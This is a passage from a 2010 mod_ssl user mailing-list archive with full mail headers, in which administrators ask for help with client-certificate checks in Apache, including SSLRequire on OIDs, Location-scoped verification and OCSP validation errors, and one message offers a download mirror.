	id A191114D88F; Mon, 10 May 2010 17:06:56 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.speos.be (mail.speos.be [213.246.255.188])
	by master.modssl.org (Postfix) with ESMTP id 2D3CE14D838
	for ; Mon, 10 May 2010 17:06:40 +0200 (CEST)
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: SSLRequire on OID extension DER encoded field value
Date: Mon, 10 May 2010 17:02:12 +0200
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSLRequire on OID extension DER encoded field value
Thread-Index: AcrwUcU/CkG671ElT0a67Lqd048DiA==
From: "Lionel Falise" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lionel Falise" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

hey guys,
I hope you're all doing fine. I need a little support here on ssl client
verification, tell me please if this is not the right place.=20

I need to check for specific extensions field value from x509 client
certificates to grant access to defined users.=20

I read this could be possible using oid() or peerextlist() functions.=20

I had to determine the field oid using openssl java package, and I'm
trying to debug the sslrequire check using setenfiv module SSI+perl
printenv.pl (maybe there is a better way to do this?).=20

So, my problem is I can't seem to find a way to validate my client based
on this field.=20

I was wondering if first: this should work? second: if extension value
is der encoded would apache be able to handle this check and how would I
store the granted values.=20

I'm using apache 2.2.9. Let me know if you need some more detailed info
on this, I can handle the certificate or my entire configuration file if
needed.

This is what I ended up trying and results:

SSLEngine on
SSLOptions +FakeBasicAuth +ExportCertData +StrictRequire +StdEnvVars=20

SSLCertificateFile ssl/server.crt
SSLCertificateKeyFile ssl/server-private.key=20

LogLevel debug
SSLVerifyClient require
SSLVerifyDepth 2
SSLCACertificateFile /ssl/clients/ca.crt


	SetenvIf OID("2.5.4.5") "(.*)" OIDTEST=3D$1
	SSLRequire "400023144340" in OID("2.5.4.5")
=09


[Mon May 10 15:59:43 2010] [info] Access to cgi-bin/printenv.pl denied
for 127.0.0.1 (requirement expression not fulfilled)=20
[Mon May 10 15:59:43 2010] [info] Failed expression: "400023144340" in
OID("2.5.4.5")

Output if bypassing the sslrequire directive (this should return the oid
matching field value, right?):
OIDTEST=3D""

Thanks in advance for your help.
Lionel
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun  1 11:42:45 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id F2B8F14DA30; Tue,  1 Jun 2010 11:42:44 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mailout.artfiles.de (mailout.artfiles.de [80.252.97.80])
	by master.modssl.org (Postfix) with ESMTP id 4F03C14D86F
	for ; Tue,  1 Jun 2010 11:42:28 +0200 (CEST)
Received: from [80.252.98.63]
	auth=anw@artfiles.de
	by mailout.artfiles.de with esmtpa (Exim 4.69)
	id 1OJNxE-0005GO-4I
	for modssl-users@modssl.org; Tue, 01 Jun 2010 11:40:12 +0200
Message-ID: <4C04D57B.3070105@artfiles.org>
Date: Tue, 01 Jun 2010 11:40:11 +0200
From: Andreas Worbs 
User-Agent: Thunderbird 2.0.0.23 (X11/20090817)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: FTP and HTTP Mirror
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andreas Worbs 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,
here are the facts about our mirror:

* URL of mirror: http://artfiles.org/modssl.org
* URL of mirror: ftp://artfiles.org/modssl.org
* Hosting institution, country and city where the mirror is located:
Artfiles New Media GmbH, Hamburg, Germany
* Contact email address: mirror@artfiles.org
* Update frequency:  daily
* Speed: 1000MBit/s
Please add us to your list.

With best regards

Artfiles New Media GmbH

Andreas Worbs

-- 
Artfiles New Media GmbH | Heidenkampsweg 100 | 20097 Hamburg
Tel: 040 - 32 02 72 90 | Fax: 040 - 32 02 72 95
E-Mail: support@artfiles.de | Web: http://www.artfiles.de
Geschäftsführer: Carsten Bals | Harald Oltmanns | Tim Evers
Eingetragen im Handelsregister Hamburg - HRB 81478

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 22 18:09:43 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6384614DA4A; Thu, 22 Jul 2010 18:09:43 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from n2-vm0.bullet.mail.gq1.yahoo.com (n2-vm0.bullet.mail.gq1.yahoo.com [67.195.23.154])
	by master.modssl.org (Postfix) with SMTP id 8769414D836
	for ; Thu, 22 Jul 2010 18:09:26 +0200 (CEST)
Received: from [67.195.9.83] by n2.bullet.mail.gq1.yahoo.com with NNFMP; 22 Jul 2010 16:07:07 -0000
Received: from [98.137.27.220] by t3.bullet.mail.gq1.yahoo.com with NNFMP; 22 Jul 2010 16:07:07 -0000
Received: from [127.0.0.1] by omp130.mail.gq1.yahoo.com with NNFMP; 22 Jul 2010 16:07:07 -0000
X-Yahoo-Newman-Property: ymail-3
X-Yahoo-Newman-Id: 390601.20653.bm@omp130.mail.gq1.yahoo.com
Received: (qmail 92573 invoked by uid 60001); 22 Jul 2010 16:07:07 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1279814826; bh=7Vxj3zLPQ0bixKsmN5EFkEhsMv+oLXeQSmRPFG8h15M=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=gssBbrEBAGidiA3kmDPlRtECZERYVaI4O9/iA/5x/1Yy1/7uAjolTf/P79RWMk4IWqEzyGovOmVoW9qTHQKtTdnaM14bSyaSQX2HXbSKLLCwrphzkyGRWRQCdKwryBSDwaTC9LV1ZN/cqzT9Fyg3f7S96TErG9ng3hvzy5OjCfs=
DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type;
  b=39K3CrWbo8M8tCimPh8reKhvLRbZ4RQLZumfYtRyMdXLhjCWUrpundZDUtNhTbbW8LKmC8Nxh7kGdaz53peqA0wHcgTZ74XYC/FPLbUXAl9hUcPzbXHyB9XiIfDI8je/ts7FQfzZeqTCgh/D7qJTZrXkyQO5bkscJ1kvmpTQbZ0=;
Message-ID: <961944.90633.qm@web120020.mail.ne1.yahoo.com>
X-YMail-OSG: aoVVQkIVM1noP.12z15EIpHUtzA_Xxf2Dbvz59RmypJfSNQ
 0IIw-
Received: from [15.203.233.79] by web120020.mail.ne1.yahoo.com via HTTP; Thu, 22 Jul 2010 09:07:06 PDT
X-Mailer: YahooMailRC/420.4 YahooMailWebService/0.8.105.277674
Date: Thu, 22 Jul 2010 09:07:06 -0700 (PDT)
From: John Carpenter 
Subject: SSLCACertificateFile getting ignored when I use a Location directive
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-790917700-1279814826=:90633"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John Carpenter 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-790917700-1279814826=:90633
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

=0A=0AHello,=0A=0AAdding  around SSLVerifyClient and SSLVerifyDep=
th is causing my mutual =0Aauthentication to fail with a ssl_error_handshak=
e_failure_alert message.=A0=A0=A0 I =0Acan't seem to determine what might b=
e causing this.=A0=A0 I'll just jump right to =0Athe code below:=0A=0A=0A[W=
ORKS]=0A=0AExcerpting my httpd.conf: =0A=0A=0A=
=A0DocumentRoot "/htdocs"=0A=A0SSLEngine on=0A=A0SSLCipherSuit=
e ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv3:+EXP:+eNULL=0A=A0SSL=
CertificateFile "/Cert/ssl.crt/server.crt"=0A=A0SSLCertificate=
KeyFile "/Cert/ssl.key/server.key"=0A=A0SSLCACertificateFile "=
 Cert/ca.cer"=0A=A0=A0SSLVerifyClient required=0A=A0=A0SSLVeri=
fyDepth 1=0A=A0 =0A=0AThe above works like a charm.=A0=A0=A0 The=
 only problem is it works EVERYWHERE I use =0A443 ... which is as expected.=
=A0=A0=A0 So when I add my  directive as below =0AI get the Error=
 code: ssl_error_handshake_failure_alert.=A0=A0=A0=A0 Though it properly =
=0Atriggers this error on requests to the specified location.=A0=A0=A0 So I=
 know that =0Apart is being picked up properly.=A0=A0=A0 Does anybody know =
what can be causing =0Athis?=A0=A0=A0=A0=A0 This seems to be how it was beh=
aving before I added in the =0ASSLCACertificateFile=A0information.=A0=A0=A0=
 Could the Location tag be causing the =0Aserver to somehow ignore my SSLCA=
CertificateFile?=A0=A0=A0 =0A=0A=0A=0A[DOESN'T WORK]=A0:=A0=A0 Error code: =
ssl_error_handshake_failure_alert=0A=A0=0A=0A=A0=
DocumentRoot "/htdocs"=0A=A0SSLEngine on=0A=A0SSLCipherSuite A=
LL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv3:+EXP:+eNULL=0A=A0SSLCer=
tificateFile "/Cert/ssl.crt/server.crt"=0A=A0SSLCertificateKey=
File "/Cert/ssl.key/server.key"=0A=A0SSLCACertificateFile " Cert/ca.cer"=0A=A0=A0=0A=A0=A0SS=
LVerifyClient required=0A=A0=A0SSLVerifyDepth 1=0A=A0=0A=A0=0A =0A=0AThanks in advance for any insight. =0A=0A-John=0A=0A=0A=0A =
     
--0-790917700-1279814826=:90633
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable


 
=0A
=0A
=0A
=0A=

Hello,
=0A
 
=0A
Adding <Location> around=
 SSLVerifyClient and SSLVerifyDepth is causing my mutual authentication to =
fail with a ssl_error_handshake_failure_alert message.    I =
can't seem to determine what might be causing this.   I'll just j=
ump right to the code below:
=0A
 
=0A
 
=
=0A
[WORKS]
=0A
 
=0A
Excerpting my httpd.conf: =

=0A
 
=0A
<VirtualHost _default_:443>
&nbs=
p;DocumentRoot "<path edited>/htdocs"
 SSLEngine on
 =
SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv3:+EXP:+e=
NULL
 SSLCertificateFile "<path edited>/Cert/ssl.crt/server.c=
rt"
 SSLCertificateKeyFile "<path edited>/Cert/ssl.key/server=
.key"
 SSLCACertificateFile "<path edited> Cert/ca.cer"
&n=
bsp; SSLVerifyClient required
  SSLVerifyDepth 1
 =
;<truncated> 
=0A
 
=0A
The above works like a=
 charm.    The only problem is it works EVERYWHERE I use 443=
 ... which is as expected.    So when I add my <Location&=
gt; directive as below I get the Error code: ssl_error_handshake_failure_al=
ert.     Though it properly triggers this error on requ=
ests to the specified location.    So I know that part is be=
ing picked up properly.    Does anybody know what can be cau=
sing this?      This seems to be how it was behavi=
ng before I added in the SSLCACertificateFile information.  =
  Could the Location tag be causing the server to somehow ignore my SS=
LCACertificateFile?    
=0A
 
=0A
&nb=
sp;
=0A
[DOESN'T WORK] :   Er=
ror code: ssl_error_handshake_failure_alert
=0A
 
=0A
<VirtualHost _default_:443>
=
 DocumentRoot "<path edited>/htdocs"
 SSLEngine on
&n=
bsp;SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv3:+EX=
P:+eNULL
 SSLCertificateFile "<path edited>/Cert/ssl.crt/serv=
er.crt"
 SSLCertificateKeyFile "<path edited>/Cert/ssl.key/se=
rver.key"
 SSLCACertificateFile "<path edited> Cert/ca.cer"  <Location /l=
ogonWithCertificate> 
=0A
  SSLVerifyClie=
nt required
  SSLVerifyDepth 1
=0A
 </Location>
 
=0A
<truncated>=
; 
=0A
 
=0A
Thanks in advance for any insight. =0A
 
=0A
-John

=0A

=0A=0A=0A=0A=0A=0A=
=0A=0A      
--0-790917700-1279814826=:90633--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 27 16:45:43 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 94C9914D9EA; Tue, 27 Jul 2010 16:45:43 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mailgw02.cybercomgroup.com (mailgw02.cybercomgroup.com [193.108.42.45])
	by master.modssl.org (Postfix) with ESMTP id 33F7314D836
	for ; Tue, 27 Jul 2010 16:45:26 +0200 (CEST)
Received: from MMACAS02.global.ad (mmacas02 [10.130.2.22])
	(using TLSv1 with cipher RC4-MD5 (128/128 bits))
	(No client certificate requested)
	by mailgw02.cybercomgroup.com (Postfix) with ESMTP id B8260EE0127
	for ; Tue, 27 Jul 2010 16:43:03 +0200 (CEST)
Received: from MMAMBX00.global.ad ([10.130.0.11]) by MMACAS02.global.ad
 ([10.130.2.22]) with mapi; Tue, 27 Jul 2010 16:42:33 +0200
From: Ulf Wahlqvist 
To: "modssl-users@modssl.org" 
Date: Tue, 27 Jul 2010 16:43:02 +0200
Subject: OCSP-validation fails
Thread-Topic: OCSP-validation fails
Thread-Index: Acss0pAB/FXj1IPlRIG0EH/zzR5YLgAwvGig
Message-ID: 
Accept-Language: sv-SE
Content-Language: en-US
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
acceptlanguage: sv-SE
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
MIME-Version: 1.0
X-CybercomGroup-MailScanner-Information: Please contact the ISP for more information
X-CybercomGroup-MailScanner: Found to be clean
X-CybercomGroup-MailScanner-SpamCheck: not spam, SpamAssassin (not cached,
	score=-1.23, required 6, ALL_TRUSTED -1.44, AWL 0.21)
X-CybercomGroup-MailScanner-From: ulf.wahlqvist@cybercomgroup.com
X-Spam-Status: No
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ulf Wahlqvist 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi


I'm trying to get Apache to do Client certificate verification with OCSP-va=
lidation.
It works without OCSP, but OCSP-validation fails when I turn it on.

The error is "OCSP_check_validity:status too old", but that doesn't make se=
nse because the clocks are within 2 seconds.=20
The client (Apache) says "Mon Jul 26 15:50:06.488292 2010" and the response=
 says "Mon, 26 Jul 2010 13:50:05 GMT" which is the same time.

//// Can there be a problem with comparing timestamps?

A more likely problem might be that the OCSP-responder require a SIGNED mes=
sage, but I don't understand how to get Apache to sign it. Some European OC=
SP-responders seems to accept only signed requests and I'm trying to find o=
ut if this is one of them.

//// Will Apache be able to sign OCSP-requests ( In that case - How do I pa=
ss the cert/key) ?=20

** my config **************************************************************=
***********************************************************************=20

[root@fedoragui logs]# httpd -v
Server version: Apache/2.3.6 (Unix)
Server built:=A0=A0 Jul 16 2010 15:31:39

[root@fedoragui logs]# openssl version
OpenSSL 1.0.0a-fips 1 Jun 2010

./configure --enable-ssl


** error_log **************************************************************=
***********************************************************************

[Mon Jul 26 15:50:05.782378 2010] [info] [pid 9164:tid 3053448048] [client =
10.0.2.2:2112] Connection to child 193 established (server fedoragui.mydoma=
in.com:443)
[Mon Jul 26 15:50:06.461652 2010] [debug] [pid 9164:tid 3053448048] ssl_uti=
l_ocsp.c(79): [client 10.0.2.2:2112] connecting to OCSP responder 'ocsp.tru=
st.telia.com'
[Mon Jul 26 15:50:06.466167 2010] [debug] [pid 9164:tid 3053448048] ssl_uti=
l_ocsp.c(105): [client 10.0.2.2:2112] sending request to OCSP responder
[Mon Jul 26 15:50:06.488292 2010] [debug] [pid 9164:tid 3053448048] ssl_uti=
l_ocsp.c(209): [client 10.0.2.2:2112] OCSP response header: Date: Mon, 26 J=
ul 2010 13:50:05 GMT
[Mon Jul 26 15:50:06.493946 2010] [debug] [pid 9164:tid 3053448048] ssl_uti=
l_ocsp.c(209): [client 10.0.2.2:2112] OCSP response header: Server: Apache
[Mon Jul 26 15:50:06.494352 2010] [debug] [pid 9164:tid 3053448048] ssl_uti=
l_ocsp.c(209): [client 10.0.2.2:2112] OCSP response header: Content-Length:=
 1264
[Mon Jul 26 15:50:06.494828 2010] [debug] [pid 9164:tid 3053448048] ssl_uti=
l_ocsp.c(209): [client 10.0.2.2:2112] OCSP response header: Connection: clo=
se
[Mon Jul 26 15:50:06.495071 2010] [debug] [pid 9164:tid 3053448048] ssl_uti=
l_ocsp.c(209): [client 10.0.2.2:2112] OCSP response header: Content-Type: a=
pplication/ocsp-response
[Mon Jul 26 15:50:06.495303 2010] [debug] [pid 9164:tid 3053448048] ssl_uti=
l_ocsp.c(252): [client 10.0.2.2:2112] OCSP response: got 1264 bytes, 1264 t=
otal
[Mon Jul 26 15:50:06.498272 2010] [debug] [pid 9164:tid 3053448048] ssl_uti=
l_ocsp.c(235): [client 10.0.2.2:2112] OCSP response: got EOF
[Mon Jul 26 15:50:06.500184 2010] [error] [pid 9164:tid 3053448048] SSL Lib=
rary Error: error:2707307F:OCSP routines:OCSP_check_validity:status too old
[Mon Jul 26 15:50:06.504012 2010] [error] [pid 9164:tid 3053448048] [client=
 10.0.2.2:2112] Certificate Verification: Error (50): application verificat=
ion failure
[Mon Jul 26 15:50:06.504430 2010] [info] [pid 9164:tid 3053448048] [client =
10.0.2.2:2112] SSL library error 1 in handshake (server fedoragui.mydomain.=
com:443)

/ulfW

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 29 12:59:30 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9170814DA61; Thu, 29 Jul 2010 12:59:30 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mailgw01.cybercomgroup.com (mailgw01.cybercomgroup.com [193.108.42.46])
	by master.modssl.org (Postfix) with ESMTP id 4C45914D836
	for ; Thu, 29 Jul 2010 12:59:12 +0200 (CEST)
Received: from MMACAS01.global.ad (unknown [10.130.2.21])
	(using TLSv1 with cipher RC4-MD5 (128/128 bits))
	(No client certificate requested)
	by mailgw01.cybercomgroup.com (Postfix) with ESMTP id 91C32680B0D
	for ; Thu, 29 Jul 2010 12:56:48 +0200 (CEST)
Received: from MMAMBX00.global.ad ([10.130.0.12]) by MMACAS01.global.ad
 ([10.130.2.21]) with mapi; Thu, 29 Jul 2010 12:56:48 +0200
From: Ulf Wahlqvist 
To: "modssl-users@modssl.org" 
Date: Thu, 29 Jul 2010 12:56:45 +0200
Subject: RE: OCSP-validation fails - UPDATE
Thread-Topic: OCSP-validation fails - UPDATE
Thread-Index: Acss0pAB/FXj1IPlRIG0EH/zzR5YLgAwvGigAF2cUyA=
Message-ID: 
References: 
In-Reply-To: 
Accept-Language: sv-SE
Content-Language: en-US
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
acceptlanguage: sv-SE
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
MIME-Version: 1.0
X-CybercomGroup-MailScanner-Information: Please contact the ISP for more information
X-CybercomGroup-MailScanner: Found to be clean
X-CybercomGroup-MailScanner-SpamCheck: not spam, SpamAssassin (not cached,
	score=-0.032, required 6, ALL_TRUSTED -1.44, AWL 1.41)
X-CybercomGroup-MailScanner-From: ulf.wahlqvist@cybercomgroup.com
X-Spam-Status: No
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ulf Wahlqvist 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have now verified that if I use openssl directly from command line it wil=
l verify OK. Apparently there is no need for signing the request. =20

>openssl ocsp -issuer /usr/local/apache2/conf/SITHS_CA_v3.cer -CAfile /usr/=
local/apache2/conf/SITHS_CA_v3.cer -cert /mnt/download/uwcert.cer -text -ur=
l http://ocsp.trust.telia.com
.
.
.
.
Response verify OK
/mnt/download/uwcert.cer: good
	This Update: Jul 29 10:43:41 2010 GMT
	Next Update: Jul 30 10:43:45 2010 GMT

/ulfW



-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] =
On Behalf Of Ulf Wahlqvist
Sent: den 27 juli 2010 16:43
To: modssl-users@modssl.org
Subject: OCSP-validation fails

Hi


I'm trying to get Apache to do Client certificate verification with OCSP-va=
lidation.
It works without OCSP, but OCSP-validation fails when I turn it on.

The error is "OCSP_check_validity:status too old", but that doesn't make se=
nse because the clocks are within 2 seconds.=20
The client (Apache) says "Mon Jul 26 15:50:06.488292 2010" and the response=
 says "Mon, 26 Jul 2010 13:50:05 GMT" which is the same time.

//// Can there be a problem with comparing timestamps?

A more likely problem might be that the OCSP-responder require a SIGNED mes=
sage, but I don't understand how to get Apache to sign it. Some European OC=
SP-responders seems to accept only signed requests and I'm trying to find o=
ut if this is one of them.

//// Will Apache be able to sign OCSP-requests ( In that case - How do I pa=
ss the cert/key) ?=20

** my config **************************************************************=
***********************************************************************=20

[root@fedoragui logs]# httpd -v
Server version: Apache/2.3.6 (Unix)
Server built:=A0=A0 Jul 16 2010 15:31:39

[root@fedoragui logs]# openssl version
OpenSSL 1.0.0a-fips 1 Jun 2010

./configure --enable-ssl


** error_log **************************************************************=
***********************************************************************

[Mon Jul 26 15:50:05.782378 2010] [info] [pid 9164:tid 3053448048] [client =
10.0.2.2:2112] Connection to child 193 established (server fedoragui.mydoma=
in.com:443) [Mon Jul 26 15:50:06.461652 2010] [debug] [pid 9164:tid 3053448=
048] ssl_util_ocsp.c(79): [client 10.0.2.2:2112] connecting to OCSP respond=
er 'ocsp.trust.telia.com'
[Mon Jul 26 15:50:06.466167 2010] [debug] [pid 9164:tid 3053448048] ssl_uti=
l_ocsp.c(105): [client 10.0.2.2:2112] sending request to OCSP responder [Mo=
n Jul 26 15:50:06.488292 2010] [debug] [pid 9164:tid 3053448048] ssl_util_o=
csp.c(209): [client 10.0.2.2:2112] OCSP response header: Date: Mon, 26 Jul =
2010 13:50:05 GMT [Mon Jul 26 15:50:06.493946 2010] [debug] [pid 9164:tid 3=
053448048] ssl_util_ocsp.c(209): [client 10.0.2.2:2112] OCSP response heade=
r: Server: Apache [Mon Jul 26 15:50:06.494352 2010] [debug] [pid 9164:tid 3=
053448048] ssl_util_ocsp.c(209): [client 10.0.2.2:2112] OCSP response heade=
r: Content-Length: 1264 [Mon Jul 26 15:50:06.494828 2010] [debug] [pid 9164=
:tid 3053448048] ssl_util_ocsp.c(209): [client 10.0.2.2:2112] OCSP response=
 header: Connection: close [Mon Jul 26 15:50:06.495071 2010] [debug] [pid 9=
164:tid 3053448048] ssl_util_ocsp.c(209): [client 10.0.2.2:2112] OCSP respo=
nse header: Content-Type: application/ocsp-response [Mon Jul 26 15:50:06.49=
5303 2010] [debug] [pid 9164:tid 3053448048] ssl_util_ocsp.c(252): [client =
10.0.2.2:2112] OCSP response: got 1264 bytes, 1264 total [Mon Jul 26 15:50:=
06.498272 2010] [debug] [pid 9164:tid 3053448048] ssl_util_ocsp.c(235): [cl=
ient 10.0.2.2:2112] OCSP response: got EOF [Mon Jul 26 15:50:06.500184 2010=
] [error] [pid 9164:tid 3053448048] SSL Library Error: error:2707307F:OCSP =
routines:OCSP_check_validity:status too old [Mon Jul 26 15:50:06.504012 201=
0] [error] [pid 9164:tid 3053448048] [client 10.0.2.2:2112] Certificate Ver=
ification: Error (50): application verification failure [Mon Jul 26 15:50:0=
6.504430 2010] [info] [pid 9164:tid 3053448048] [client 10.0.2.2:2112] SSL =
library error 1 in handshake (server fedoragui.mydomain.com:443)

/ulfW

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 17 12:50:17 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4C9C914DA46; Tue, 17 Aug 2010 12:50:17 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mailgw1.cybercomgroup.com (mailgw1.cybercomgroup.com [193.108.42.45])
	by master.modssl.org (Postfix) with ESMTP id CFED814D836
	for ; Tue, 17 Aug 2010 12:50:00 +0200 (CEST)
Received: from MMACAS02.global.ad (unknown [192.168.9.7])
	(using TLSv1 with cipher RC4-MD5 (128/128 bits))
	(No client certificate requested)
	by mailgw1.cybercomgroup.com (Postfix) with ESMTPS id A47F360F80
	for ; Tue, 17 Aug 2010 12:47:23 +0200 (CEST)
DKIM-Signature: v=1; a=rsa-sha256; c=simple/simple; d=cybercomgroup.com;
	s=mail; t=1282042043;
	bh=CwlgG5tsvWIrXpiONd0Za3RuHsDmKNypM3NnGahr4n4=;
	h=From:To:Date:Subject:Message-ID:References:In-Reply-To:
	 Content-Type:Content-Transfer-Encoding:MIME-Version;
	b=GekCURZx44tn64vPjQfaLfIDZNokG3rYHoG0Hd1E0iLrL/LOkv0/Fn0jGWRmnTIJ1
	 3l3KRGq8UYqtDYRKPRZfwbs5A5rtf8iLYbGNqrLpoaxGPpIusdiqEpzPh05GUPvDCM
	 sP0j3f7OQdxaahwDvMsOdsiYOPJqk/w+qDlXJEgI=
Received: from MMAMBX00.global.ad ([10.130.0.12]) by MMACAS02.global.ad
 ([10.130.2.22]) with mapi; Tue, 17 Aug 2010 12:47:29 +0200
From: Ulf Wahlqvist 
To: "modssl-users@modssl.org" 
Date: Tue, 17 Aug 2010 12:47:26 +0200
Subject: RE: OCSP-validation fails - Wrong cert passed to OCSP by Apache
Thread-Topic: OCSP-validation fails - Wrong cert passed to OCSP by Apache
Thread-Index: Acss0pAB/FXj1IPlRIG0EH/zzR5YLgAwvGigAF2cUyADuzx3kA==
Message-ID: 
References: 
 
In-Reply-To: 
Accept-Language: sv-SE
Content-Language: en-US
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
acceptlanguage: sv-SE
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
MIME-Version: 1.0
X-CybercomGroup-MailScanner-ID: A47F360F80.A83EE
X-CybercomGroup-MailScanner: Found to be clean
X-CybercomGroup-MailScanner-SpamCheck: not spam, SpamAssassin (not cached,
	score=-2.9, required 6, autolearn=not spam, ALL_TRUSTED -1.00,
	BAYES_00 -1.90)
X-CybercomGroup-MailScanner-From: ulf.wahlqvist@cybercomgroup.com
X-Spam-Status: No
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ulf Wahlqvist 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I still don't get it. I used Wireshark and found out that the certificate s=
ent to the OCSP-responder is the CA-cert, not the client-cert to be validat=
ed! I am clueless.


Online Certificate Status Protocol
    tbsRequest
        requestList: 1 item
            Request
                reqCert
                    hashAlgorithm (SHA-1)
                        Algorithm Id: 1.3.14.3.2.26 (SHA-1)
                    issuerNameHash: 3183A656588CA87A8D663E5721EF4BC860D9EC8=
6
                    issuerKeyHash: 7C2E39233244E80F4E66F20D28FE40BEC2B6E2A0
                    serialNumber : 0x1bd40ed434d1da15a6003015024da46c <- TH=
IS IS THE SERIALNUMBER FOR THE CA-CERT

/ulfW

PS Is this mailing list active?=20
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 17 16:03:30 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2648214DA75; Tue, 17 Aug 2010 16:03:30 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [209.132.183.28])
	by master.modssl.org (Postfix) with ESMTP id 82E1714DA61
	for ; Tue, 17 Aug 2010 16:03:13 +0200 (CEST)
Received: from int-mx03.intmail.prod.int.phx2.redhat.com (int-mx03.intmail.prod.int.phx2.redhat.com [10.5.11.16])
	by mx1.redhat.com (8.13.8/8.13.8) with ESMTP id o7HE0jWK029184
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=OK);
	Tue, 17 Aug 2010 10:00:45 -0400
Received: from turnip.manyfish.co.uk (vpn-8-174.rdu.redhat.com [10.11.8.174])
	by int-mx03.intmail.prod.int.phx2.redhat.com (8.13.8/8.13.8) with ESMTP id o7HE0dul015750
